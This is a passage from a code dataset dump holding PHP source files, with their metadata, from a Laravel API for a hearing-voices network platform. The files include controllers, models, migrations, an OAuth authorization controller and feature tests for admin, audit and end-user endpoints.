"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Resources;\n\nuse Illuminate\\Http\\Resources\\Json\\JsonResource;\nuse Illuminate\\Support\\Facades\\Config;\n\n/**\n * @property \\App\\Models\\FileToken $resource\n */\nclass FileTokenResource extends JsonResource\n{\n /**\n * Transform the resource into an array.\n *\n * @param \\Illuminate\\Http\\Request $request\n * @return array\n */\n public function toArray($request): array\n {\n $fileTokenId = $this->resource->id;\n $fileId = $this->resource->file_id;\n\n return [\n 'token' => $this->resource->id,\n 'download_url' => route('files.download', $fileId) . \"?token={$fileTokenId}\",\n 'expires_at' => $this->resource->created_at->addSeconds(\n Config::get('connecting_voices.file_tokens.expiry_time')\n )->toIso8601String(),\n ];\n }\n}\n"
},
{
"alpha_fraction": 0.5738396644592285,
"alphanum_fraction": 0.5746835470199585,
"avg_line_length": 19.084745407104492,
"blob_id": "ffd68ac54b337689b9b0fe1b55c2fa4f4ed67c7f",
"content_id": "e820f91cf7bac6e89196014d8f8c2f88d6c61afa",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1185,
"license_type": "permissive",
"max_line_length": 82,
"num_lines": 59,
"path": "/app/Models/Export.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models;\n\nuse InvalidArgumentException;\n\n/**\n * @property \\App\\Models\\FileToken $fileToken\n * @property string $decryptionKey\n */\nclass Export\n{\n /**\n * @var \\App\\Models\\FileToken\n */\n protected $fileToken;\n\n /**\n * @var string\n */\n protected $decryptionKey;\n\n /**\n * Export constructor.\n *\n * @param \\App\\Models\\FileToken $fileToken\n * @param string $decryptionKey\n */\n public function __construct(FileToken $fileToken, string $decryptionKey)\n {\n $this->fileToken = $fileToken;\n $this->decryptionKey = $decryptionKey;\n }\n\n /**\n * @param string $name\n * @return mixed\n */\n public function __get(string $name)\n {\n if (property_exists($this, $name)) {\n return $this->$name;\n }\n\n throw new InvalidArgumentException(\"The property [$name] does not exist\");\n }\n\n /**\n * @param \\App\\Models\\Export $export\n * @return bool\n */\n public function is(self $export): bool\n {\n return $this->fileToken === $export->fileToken\n && $this->decryptionKey === $export->decryptionKey;\n }\n}\n"
},
{
"alpha_fraction": 0.5302644968032837,
"alphanum_fraction": 0.5381485223770142,
"avg_line_length": 27.91176414489746,
"blob_id": "3f2feccdf8d0b34bc4cbfc2b358bfafddd8c52f2",
"content_id": "6b5b798bd93ca121f57d993022d26c41792c9035",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 3932,
"license_type": "permissive",
"max_line_length": 87,
"num_lines": 136,
"path": "/tests/Feature/V1/EndUser/MeControllerTest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace Tests\\Feature\\V1\\EndUser;\n\nuse App\\Events\\EndpointInvoked;\nuse App\\Models\\Admin;\nuse App\\Models\\Audit;\nuse App\\Models\\EndUser;\nuse Illuminate\\Http\\Response;\nuse Illuminate\\Support\\Facades\\Event;\nuse Laravel\\Passport\\Passport;\nuse Tests\\TestCase;\n\nclass MeControllerTest extends TestCase\n{\n /*\n * Invoke.\n */\n\n /** @test */\n public function guest_cannot_invoke(): void\n {\n $response = $this->getJson('/v1/end-users/me');\n\n $response->assertStatus(Response::HTTP_UNAUTHORIZED);\n }\n\n /** @test */\n public function end_user_can_invoke(): void\n {\n $endUser = factory(EndUser::class)->create();\n\n Passport::actingAs($endUser->user);\n\n $response = $this->getJson('/v1/end-users/me');\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function admin_cannot_invoke(): void\n {\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson('/v1/end-users/me');\n\n $response->assertStatus(Response::HTTP_FORBIDDEN);\n }\n\n /** @test */\n public function structure_correct_for_invoke(): void\n {\n Passport::actingAs(\n factory(EndUser::class)->create()->user\n );\n\n $response = $this->getJson('/v1/end-users/me');\n\n $response->assertResourceDataStructure([\n 'id',\n 'email',\n 'country',\n 'birth_year',\n 'gender',\n 'ethnicity',\n 'contributions_count',\n 'public_contributions_count',\n 'private_contributions_count',\n 'in_review_contributions_count',\n 'changes_requested_contributions_count',\n 'gdpr_consented_at',\n 'email_verified_at',\n 'created_at',\n 'updated_at',\n 'deleted_at',\n ]);\n }\n\n /** @test */\n public function values_correct_for_invoke(): void\n {\n $endUser = factory(EndUser::class)->create();\n\n Passport::actingAs($endUser->user);\n\n $response = $this->getJson('/v1/end-users/me');\n\n $response->assertJsonFragment([\n 'id' => $endUser->id,\n 'email' => $endUser->user->email,\n 'country' => $endUser->country,\n 'birth_year' => $endUser->birth_year,\n 'gender' => $endUser->gender,\n 'ethnicity' => $endUser->ethnicity,\n 'contributions_count' => 0,\n 'public_contributions_count' => 0,\n 'private_contributions_count' => 0,\n 'in_review_contributions_count' => 0,\n 'changes_requested_contributions_count' => 0,\n 'gdpr_consented_at' => $endUser->gdpr_consented_at->toIso8601String(),\n 'email_verified_at' => null,\n 'created_at' => $endUser->user->created_at->toIso8601String(),\n 'updated_at' => $endUser->user->updated_at->toIso8601String(),\n 'deleted_at' => null,\n ]);\n }\n\n /** @test */\n public function endpoint_invoked_event_dispatched_for_invoke(): void\n {\n Event::fake([EndpointInvoked::class]);\n\n /** @var \\App\\Models\\EndUser $endUser */\n $endUser = factory(EndUser::class)->create();\n\n Passport::actingAs($endUser->user);\n\n $this->getJson('/v1/end-users/me');\n\n Event::assertDispatched(\n EndpointInvoked::class,\n function (EndpointInvoked $event) use ($endUser): bool {\n return $event->getUser()->is($endUser->user)\n && $event->getClient() === null\n && $event->getAction() === Audit::ACTION_READ\n && $event->getDescription() === \"Viewed end user [{$endUser->id}].\"\n && $event->getIpAddress() === '127.0.0.1'\n && $event->getUserAgent() === 'Symfony';\n }\n );\n }\n}\n"
},
{
"alpha_fraction": 0.7145110368728638,
"alphanum_fraction": 0.7160883545875549,
"avg_line_length": 26.565217971801758,
"blob_id": "d74b66b934eb795fcff987d19f380c37b6e557a3",
"content_id": "3eeb13ff74bf8faf0462c4927bf1941b23456dd4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 634,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 23,
"path": "/app/Docs/ExternalDocs.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs;\n\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\ExternalDocs as BaseExternalDocs;\nuse Illuminate\\Support\\Facades\\Config;\n\nclass ExternalDocs extends BaseExternalDocs\n{\n /**\n * @param string|null $objectId\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\ExternalDocs\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->description('The GitHub repo')\n ->url(Config::get('connecting_voices.repo_url'));\n }\n}\n"
},
{
"alpha_fraction": 0.6098606586456299,
"alphanum_fraction": 0.6102893948554993,
"avg_line_length": 29.6907901763916,
"blob_id": "d6630542a3b93ac4e9341255593c39a5d2e8f008",
"content_id": "81b34bcec7d249db846711ffe9f184c32156d497",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 4665,
"license_type": "permissive",
"max_line_length": 84,
"num_lines": 152,
"path": "/app/Http/Controllers/V1/AdminController.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Controllers\\V1;\n\nuse App\\Events\\EndpointInvoked;\nuse App\\Http\\Controllers\\ApiController;\nuse App\\Http\\Filters\\Admin\\EmailFilter;\nuse App\\Http\\Requests\\Admin\\StoreAdminRequest;\nuse App\\Http\\Requests\\Admin\\UpdateAdminRequest;\nuse App\\Http\\Resources\\AdminResource;\nuse App\\Http\\Responses\\ResourceDeletedResponse;\nuse App\\Http\\Sorts\\Admin\\EmailSort;\nuse App\\Models\\Admin;\nuse App\\Services\\AdminService;\nuse App\\Support\\Pagination;\nuse Illuminate\\Http\\Request;\nuse Illuminate\\Http\\Resources\\Json\\JsonResource;\nuse Illuminate\\Http\\Resources\\Json\\ResourceCollection;\nuse Illuminate\\Support\\Facades\\DB;\nuse Spatie\\QueryBuilder\\Filter;\nuse Spatie\\QueryBuilder\\QueryBuilder;\nuse Spatie\\QueryBuilder\\Sort;\n\nclass AdminController extends ApiController\n{\n /**\n * @var \\App\\Services\\AdminService\n */\n protected $adminService;\n\n /**\n * AdminController constructor.\n *\n * @param \\Illuminate\\Http\\Request $request\n * @param \\App\\Support\\Pagination $pagination\n * @param \\App\\Services\\AdminService $adminService\n */\n public function __construct(\n Request $request,\n Pagination $pagination,\n AdminService $adminService\n ) {\n parent::__construct($request, $pagination);\n\n $this->middleware(['auth:api', 'verified']);\n $this->authorizeResource(Admin::class);\n\n $this->adminService = $adminService;\n }\n\n /**\n * @param \\Illuminate\\Http\\Request $request\n * @return \\Illuminate\\Http\\Resources\\Json\\ResourceCollection\n */\n public function index(Request $request): ResourceCollection\n {\n $baseQuery = Admin::query()\n ->with('user');\n\n $admins = QueryBuilder::for($baseQuery)\n ->allowedFilters([\n Filter::exact('id'),\n 'name',\n 'phone',\n Filter::custom('email', EmailFilter::class),\n ])\n ->allowedSorts([\n 'name',\n 'phone',\n Sort::custom('email', EmailSort::class),\n ])\n ->defaultSort('name')\n ->paginate($this->perPage);\n\n event(EndpointInvoked::onRead($request, 'Viewed all admins.'));\n\n return AdminResource::collection($admins);\n }\n\n /**\n * @param \\App\\Http\\Requests\\Admin\\StoreAdminRequest $request\n * @throws \\Throwable\n * @return \\Illuminate\\Http\\Resources\\Json\\JsonResource\n */\n public function store(StoreAdminRequest $request): JsonResource\n {\n $admin = DB::transaction(function () use ($request): Admin {\n return $this->adminService->create([\n 'name' => $request->name,\n 'phone' => $request->phone,\n 'email' => $request->email,\n 'password' => $request->password,\n ]);\n });\n\n event(EndpointInvoked::onCreate($request, \"Created admin [{$admin->id}].\"));\n\n return new AdminResource($admin);\n }\n\n /**\n * @param \\Illuminate\\Http\\Request $request\n * @param \\App\\Models\\Admin $admin\n * @return \\Illuminate\\Http\\Resources\\Json\\JsonResource\n */\n public function show(Request $request, Admin $admin): JsonResource\n {\n event(EndpointInvoked::onRead($request, \"Viewed admin [{$admin->id}].\"));\n\n return new AdminResource($admin);\n }\n\n /**\n * @param \\App\\Http\\Requests\\Admin\\UpdateAdminRequest $request\n * @param \\App\\Models\\Admin $admin\n * @throws \\Throwable\n * @return \\Illuminate\\Http\\Resources\\Json\\JsonResource\n */\n public function update(UpdateAdminRequest $request, Admin $admin): JsonResource\n {\n $admin = DB::transaction(function () use ($request, $admin): Admin {\n return $this->adminService->update($admin, [\n 'name' => $request->name,\n 'phone' => $request->phone,\n 'email' => $request->email,\n 'password' => $request->password,\n ]);\n });\n\n event(EndpointInvoked::onUpdate($request, \"Updated admin [{$admin->id}].\"));\n\n return new AdminResource($admin);\n }\n\n /**\n * @param \\Illuminate\\Http\\Request $request\n * @param \\App\\Models\\Admin $admin\n * @return \\App\\Http\\Responses\\ResourceDeletedResponse\n */\n public function destroy(Request $request, Admin $admin): ResourceDeletedResponse\n {\n DB::transaction(function () use ($admin): void {\n $this->adminService->delete($admin);\n });\n\n event(EndpointInvoked::onDelete($request, \"Deleted admin [{$admin->id}].\"));\n\n return new ResourceDeletedResponse('admin');\n }\n}\n"
},
{
"alpha_fraction": 0.6438642144203186,
"alphanum_fraction": 0.6443864107131958,
"avg_line_length": 24.87837791442871,
"blob_id": "7d76982683a22b00ff9f1b16a82567d2c0832df6",
"content_id": "e410e211c8d9732dfb326b189f74af14b28d4a75",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1915,
"license_type": "permissive",
"max_line_length": 89,
"num_lines": 74,
"path": "/app/Models/Relationships/EndUserRelationships.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models\\Relationships;\n\nuse App\\Models\\Contribution;\nuse App\\Models\\Country;\nuse App\\Models\\User;\nuse Illuminate\\Database\\Eloquent\\Relations\\BelongsTo;\nuse Illuminate\\Database\\Eloquent\\Relations\\HasMany;\n\ntrait EndUserRelationships\n{\n /**\n * @return \\Illuminate\\Database\\Eloquent\\Relations\\BelongsTo\n */\n public function user(): BelongsTo\n {\n return $this->belongsTo(User::class)->withTrashed();\n }\n\n /**\n * @return \\Illuminate\\Database\\Eloquent\\Relations\\BelongsTo\n */\n public function country(): BelongsTo\n {\n return $this->belongsTo(Country::class);\n }\n\n /**\n * @return \\Illuminate\\Database\\Eloquent\\Relations\\HasMany\n */\n public function contributions(): HasMany\n {\n return $this->hasMany(Contribution::class);\n }\n\n /**\n * @return \\Illuminate\\Database\\Eloquent\\Relations\\HasMany\n */\n public function publicContributions(): HasMany\n {\n return $this->contributions()\n ->where('contributions.status', '=', Contribution::STATUS_PUBLIC);\n }\n\n /**\n * @return \\Illuminate\\Database\\Eloquent\\Relations\\HasMany\n */\n public function privateContributions(): HasMany\n {\n return $this->contributions()\n ->where('contributions.status', '=', Contribution::STATUS_PRIVATE);\n }\n\n /**\n * @return \\Illuminate\\Database\\Eloquent\\Relations\\HasMany\n */\n public function inReviewContributions(): HasMany\n {\n return $this->contributions()\n ->where('contributions.status', '=', Contribution::STATUS_IN_REVIEW);\n }\n\n /**\n * @return \\Illuminate\\Database\\Eloquent\\Relations\\HasMany\n */\n public function changesRequestedContributions(): HasMany\n {\n return $this->contributions()\n ->where('contributions.status', '=', Contribution::STATUS_CHANGES_REQUESTED);\n }\n}\n"
},
{
"alpha_fraction": 0.5843806266784668,
"alphanum_fraction": 0.5852782726287842,
"avg_line_length": 29.108108520507812,
"blob_id": "3cc93162fea9517bd3a8d196e12e6191bfdaf73a",
"content_id": "b4dfad4a1c0b008fa7b8d031ae2797f9ba76536f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1114,
"license_type": "permissive",
"max_line_length": 89,
"num_lines": 37,
"path": "/database/migrations/2019_05_28_171853_create_contributions_table.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nuse Illuminate\\Database\\Migrations\\Migration;\nuse Illuminate\\Database\\Schema\\Blueprint;\nuse Illuminate\\Support\\Facades\\Schema;\n\nclass CreateContributionsTable extends Migration\n{\n /**\n * Run the migrations.\n */\n public function up(): void\n {\n Schema::create('contributions', function (Blueprint $table): void {\n $table->uuid('id')->primary();\n $table->uuid('end_user_id')->unique();\n $table->foreign('end_user_id')->references('id')->on('end_users');\n $table->text('content');\n $table->string('status');\n $table->foreign('status')->references('status')->on('contribution_statuses');\n $table->text('changes_requested')->nullable();\n $table->timestamp('status_last_updated_at')->useCurrent();\n $table->timestamp('created_at')->useCurrent();\n $table->timestamp('updated_at')->useCurrent();\n });\n }\n\n /**\n * Reverse the migrations.\n */\n public function down(): void\n {\n Schema::dropIfExists('contributions');\n }\n}\n"
},
{
"alpha_fraction": 0.5774253606796265,
"alphanum_fraction": 0.5783582329750061,
"avg_line_length": 27.972972869873047,
"blob_id": "a64bc583ffe6259c6b64210f7b8433d2a35e1031",
"content_id": "e64dd8e8c2c58450c4e5e84274602629bf3a09df",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1072,
"license_type": "permissive",
"max_line_length": 91,
"num_lines": 37,
"path": "/database/migrations/2019_05_29_103809_create_notifications_table.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nuse Illuminate\\Database\\Migrations\\Migration;\nuse Illuminate\\Database\\Schema\\Blueprint;\nuse Illuminate\\Support\\Facades\\Schema;\n\nclass CreateNotificationsTable extends Migration\n{\n /**\n * Run the migrations.\n */\n public function up(): void\n {\n Schema::create('notifications', function (Blueprint $table): void {\n $table->uuid('id')->primary();\n $table->uuid('user_id')->nullable();\n $table->foreign('user_id')->references('id')->on('users');\n $table->string('channel');\n $table->foreign('channel')->references('channel')->on('notification_channels');\n $table->string('recipient');\n $table->text('content');\n $table->timestamp('sent_at')->nullable();\n $table->timestamp('created_at')->useCurrent();\n $table->timestamp('updated_at')->useCurrent();\n });\n }\n\n /**\n * Reverse the migrations.\n */\n public function down(): void\n {\n Schema::dropIfExists('notifications');\n }\n}\n"
},
{
"alpha_fraction": 0.5882620811462402,
"alphanum_fraction": 0.5887170433998108,
"avg_line_length": 34.45161437988281,
"blob_id": "ffccd8528b47b9ec8c6d55650fef53611560d529",
"content_id": "7028dc696aece43443ce5c83678fae706a10eafd",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 2198,
"license_type": "permissive",
"max_line_length": 93,
"num_lines": 62,
"path": "/app/Http/Controllers/Passport/AuthorizationController.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Controllers\\Passport;\n\nuse Illuminate\\Http\\Request;\nuse Illuminate\\Http\\Response;\nuse Laravel\\Passport\\ClientRepository;\nuse Laravel\\Passport\\Http\\Controllers\\AuthorizationController as BaseAuthorizationController;\nuse Laravel\\Passport\\TokenRepository;\nuse Psr\\Http\\Message\\ServerRequestInterface;\n\nclass AuthorizationController extends BaseAuthorizationController\n{\n /**\n * Authorize a client to access the user's account.\n *\n * @param \\Psr\\Http\\Message\\ServerRequestInterface $psrRequest\n * @param \\Illuminate\\Http\\Request $request\n * @param \\Laravel\\Passport\\ClientRepository $clients\n * @param \\Laravel\\Passport\\TokenRepository $tokens\n * @return \\Illuminate\\Http\\Response\n */\n public function authorize(\n ServerRequestInterface $psrRequest,\n Request $request,\n ClientRepository $clients,\n TokenRepository $tokens\n ): Response {\n return $this->withErrorHandling(\n function () use ($psrRequest, $request, $clients, $tokens): Response {\n $authRequest = $this->server->validateAuthorizationRequest($psrRequest);\n\n $scopes = $this->parseScopes($authRequest);\n\n $token = $tokens->findValidToken(\n $user = $request->user(),\n $client = $clients->find($authRequest->getClient()->getIdentifier())\n );\n\n if ($token && $token->scopes === collect($scopes)->pluck('id')->all()) {\n return $this->approveRequest($authRequest, $user);\n }\n\n // If the client is first party, then immediately approve the request.\n if ($client->first_party_client) {\n return $this->approveRequest($authRequest, $user);\n }\n\n $request->session()->put('authRequest', $authRequest);\n\n return $this->response->view('passport::authorize', [\n 'client' => $client,\n 'user' => $user,\n 'scopes' => $scopes,\n 'request' => $request,\n ]);\n }\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6204379796981812,
"alphanum_fraction": 0.62189781665802,
"avg_line_length": 24.370370864868164,
"blob_id": "105ae56ac1ee2914773e173c11fe7e565e7a98cf",
"content_id": "7ad33ace18c7efd8688dd93709012e88cbb927b5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 685,
"license_type": "permissive",
"max_line_length": 83,
"num_lines": 27,
"path": "/app/Http/Filters/Audit/EndUserIdFilter.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Filters\\Audit;\n\nuse Illuminate\\Database\\Eloquent\\Builder;\nuse Spatie\\QueryBuilder\\Filters\\Filter;\n\nclass EndUserIdFilter implements Filter\n{\n /**\n * @param \\Illuminate\\Database\\Eloquent\\Builder $query\n * @param string $endUserId\n * @param string $property\n * @return \\Illuminate\\Database\\Eloquent\\Builder\n */\n public function __invoke(Builder $query, $endUserId, string $property): Builder\n {\n return $query->whereHas(\n 'user.endUser',\n function (Builder $query) use ($endUserId): void {\n $query->where('id', '=', $endUserId);\n }\n );\n }\n}\n"
},
{
"alpha_fraction": 0.49272987246513367,
"alphanum_fraction": 0.4998975992202759,
"avg_line_length": 26.902856826782227,
"blob_id": "564437c8ac137794cdf5f522908a88f70f454100",
"content_id": "f648127f87de2abc5400d6019d7781e5baa004c8",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 9766,
"license_type": "permissive",
"max_line_length": 91,
"num_lines": 350,
"path": "/tests/Feature/V1/AuditControllerTest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace Tests\\Feature\\V1;\n\nuse App\\Events\\EndpointInvoked;\nuse App\\Models\\Admin;\nuse App\\Models\\Audit;\nuse App\\Models\\EndUser;\nuse Illuminate\\Http\\Response;\nuse Illuminate\\Support\\Facades\\Date;\nuse Illuminate\\Support\\Facades\\Event;\nuse Laravel\\Passport\\ClientRepository;\nuse Laravel\\Passport\\Passport;\nuse Tests\\TestCase;\n\nclass AuditControllerTest extends TestCase\n{\n /*\n * Index.\n */\n\n /** @test */\n public function guest_cannot_index(): void\n {\n $response = $this->getJson('/v1/audits');\n\n $response->assertStatus(Response::HTTP_UNAUTHORIZED);\n }\n\n /** @test */\n public function end_user_cannot_index(): void\n {\n Passport::actingAs(\n factory(EndUser::class)->create()->user\n );\n\n $response = $this->getJson('/v1/audits');\n\n $response->assertStatus(Response::HTTP_FORBIDDEN);\n }\n\n /** @test */\n public function admin_can_index(): void\n {\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson('/v1/audits');\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function structure_correct_for_index(): void\n {\n factory(Audit::class)->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson('/v1/audits');\n\n $response->assertCollectionDataStructure([\n 'id',\n 'admin_id',\n 'end_user_id',\n 'client',\n 'action',\n 'description',\n 'ip_address',\n 'user_agent',\n 'created_at',\n ]);\n }\n\n /** @test */\n public function values_correct_for_index(): void\n {\n $client = (new ClientRepository())\n ->create(null, 'Test Client', 'https://example.com');\n\n $audit = factory(Audit::class)->create([\n 'client_id' => $client->id,\n ]);\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson('/v1/audits');\n\n $response->assertJsonFragment([\n [\n 'id' => $audit->id,\n 'admin_id' => $audit->user_id,\n 'end_user_id' => null,\n 'client' => 'Test Client',\n 'action' => $audit->action,\n 'description' => $audit->description,\n 'ip_address' => $audit->ip_address,\n 'user_agent' => $audit->user_agent,\n 'created_at' => $audit->created_at->toIso8601String(),\n ],\n ]);\n }\n\n /** @test */\n public function can_filter_by_ids_for_index(): void\n {\n $audit1 = factory(Audit::class)->create();\n $audit2 = factory(Audit::class)->create();\n $audit3 = factory(Audit::class)->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson('/v1/audits', [\n 'filter[id]' => \"{$audit1->id},{$audit2->id}\",\n ]);\n\n $response->assertJsonFragment(['id' => $audit1->id]);\n $response->assertJsonFragment(['id' => $audit2->id]);\n $response->assertJsonMissing(['id' => $audit3->id]);\n }\n\n /** @test */\n public function can_filter_by_admin_id_for_index(): void\n {\n $admin1 = factory(Admin::class)->create();\n $admin2 = factory(Admin::class)->create();\n\n $audit1 = factory(Audit::class)->create([\n 'user_id' => $admin1->user->id,\n ]);\n $audit2 = factory(Audit::class)->create([\n 'user_id' => $admin2->user->id,\n ]);\n\n Passport::actingAs(\n factory(Admin::class)->create([\n 'name' => 'Test',\n ])->user\n );\n\n $response = $this->getJson('/v1/audits', ['filter[admin_id]' => $admin1->id]);\n\n $response->assertJsonFragment(['id' => $audit1->id]);\n $response->assertJsonMissing(['id' => $audit2->id]);\n }\n\n /** @test */\n public function can_filter_by_end_user_id_for_index(): void\n {\n $endUser1 = factory(EndUser::class)->create();\n $endUser2 = factory(EndUser::class)->create();\n\n $audit1 = factory(Audit::class)->create([\n 'user_id' => $endUser1->user->id,\n ]);\n $audit2 = factory(Audit::class)->create([\n 'user_id' => $endUser2->user->id,\n ]);\n\n Passport::actingAs(\n factory(Admin::class)->create([\n 'name' => 'Test',\n ])->user\n );\n\n $response = $this->getJson('/v1/audits', ['filter[end_user_id]' => $endUser1->id]);\n\n $response->assertJsonFragment(['id' => $audit1->id]);\n $response->assertJsonMissing(['id' => $audit2->id]);\n }\n\n /** @test */\n public function can_sort_by_created_at_for_index(): void\n {\n $audit1 = factory(Audit::class)->create([\n 'created_at' => Date::now(),\n ]);\n $audit2 = factory(Audit::class)->create([\n 'created_at' => Date::now()->addHour(),\n ]);\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson('/v1/audits', ['sort' => '-created_at']);\n\n $response->assertNthIdInCollection(1, $audit1->id);\n $response->assertNthIdInCollection(0, $audit2->id);\n }\n\n /** @test */\n public function endpoint_invoked_event_dispatched_for_index(): void\n {\n Event::fake([EndpointInvoked::class]);\n\n /** @var \\App\\Models\\User $user */\n $user = factory(Admin::class)->create()->user;\n\n Passport::actingAs($user);\n\n $this->getJson('/v1/audits');\n\n Event::assertDispatched(\n EndpointInvoked::class,\n function (EndpointInvoked $event) use ($user): bool {\n return $event->getUser()->is($user)\n && $event->getClient() === null\n && $event->getAction() === Audit::ACTION_READ\n && $event->getDescription() === 'Viewed all audits.'\n && $event->getIpAddress() === '127.0.0.1'\n && $event->getUserAgent() === 'Symfony';\n }\n );\n }\n\n /*\n * Show/\n */\n\n /** @test */\n public function guest_cannot_show(): void\n {\n $audit = factory(Audit::class)->create();\n\n $response = $this->getJson(\"/v1/audits/{$audit->id}\");\n\n $response->assertStatus(Response::HTTP_UNAUTHORIZED);\n }\n\n /** @test */\n public function end_user_cannot_show(): void\n {\n $audit = factory(Audit::class)->create();\n\n Passport::actingAs(\n factory(EndUser::class)->create()->user\n );\n\n $response = $this->getJson(\"/v1/audits/{$audit->id}\");\n\n $response->assertStatus(Response::HTTP_FORBIDDEN);\n }\n\n /** @test */\n public function admin_can_show(): void\n {\n $audit = factory(Audit::class)->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson(\"/v1/audits/{$audit->id}\");\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function structure_correct_for_show(): void\n {\n $audit = factory(Audit::class)->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson(\"/v1/audits/{$audit->id}\");\n\n $response->assertResourceDataStructure([\n 'id',\n 'admin_id',\n 'end_user_id',\n 'client',\n 'action',\n 'description',\n 'ip_address',\n 'user_agent',\n 'created_at',\n ]);\n }\n\n /** @test */\n public function values_correct_for_show(): void\n {\n $client = (new ClientRepository())\n ->create(null, 'Test Client', 'https://example.com');\n\n $audit = factory(Audit::class)->create([\n 'client_id' => $client->id,\n ]);\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson(\"/v1/audits/{$audit->id}\");\n\n $response->assertJsonFragment([\n [\n 'id' => $audit->id,\n 'admin_id' => $audit->user_id,\n 'end_user_id' => null,\n 'client' => 'Test Client',\n 'action' => $audit->action,\n 'description' => $audit->description,\n 'ip_address' => $audit->ip_address,\n 'user_agent' => $audit->user_agent,\n 'created_at' => $audit->created_at->toIso8601String(),\n ],\n ]);\n }\n\n /** @test */\n public function endpoint_invoked_event_dispatched_for_show(): void\n {\n Event::fake([EndpointInvoked::class]);\n\n /** @var \\App\\Models\\Audit $audit */\n $audit = factory(Audit::class)->create();\n\n /** @var \\App\\Models\\User $user */\n $user = factory(Admin::class)->create()->user;\n\n Passport::actingAs($user);\n\n $this->getJson(\"/v1/audits/{$audit->id}\");\n\n Event::assertDispatched(\n EndpointInvoked::class,\n function (EndpointInvoked $event) use ($audit, $user): bool {\n return $event->getUser()->is($user)\n && $event->getClient() === null\n && $event->getAction() === Audit::ACTION_READ\n && $event->getDescription() === \"Viewed audit [{$audit->id}].\"\n && $event->getIpAddress() === '127.0.0.1'\n && $event->getUserAgent() === 'Symfony';\n }\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6202723383903503,
"alphanum_fraction": 0.6217851638793945,
"avg_line_length": 16.394737243652344,
"blob_id": "42067ce4d57c4773c441567890a148e915078dd5",
"content_id": "7ff476061049ade3b563e0980827749f45927421",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 661,
"license_type": "permissive",
"max_line_length": 49,
"num_lines": 38,
"path": "/app/Events/EndUser/EndUserSoftDeleted.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Events\\EndUser;\n\nuse App\\Models\\EndUser;\nuse Illuminate\\Foundation\\Events\\Dispatchable;\nuse Illuminate\\Queue\\SerializesModels;\n\nclass EndUserSoftDeleted\n{\n use Dispatchable;\n use SerializesModels;\n\n /**\n * @var \\App\\Models\\EndUser\n */\n protected $endUser;\n\n /**\n * EndUserCreated constructor.\n *\n * @param \\App\\Models\\EndUser $endUser\n */\n public function __construct(EndUser $endUser)\n {\n $this->endUser = $endUser;\n }\n\n /**\n * @return \\App\\Models\\EndUser\n */\n public function getEndUser(): EndUser\n {\n return $this->endUser;\n }\n}\n"
},
{
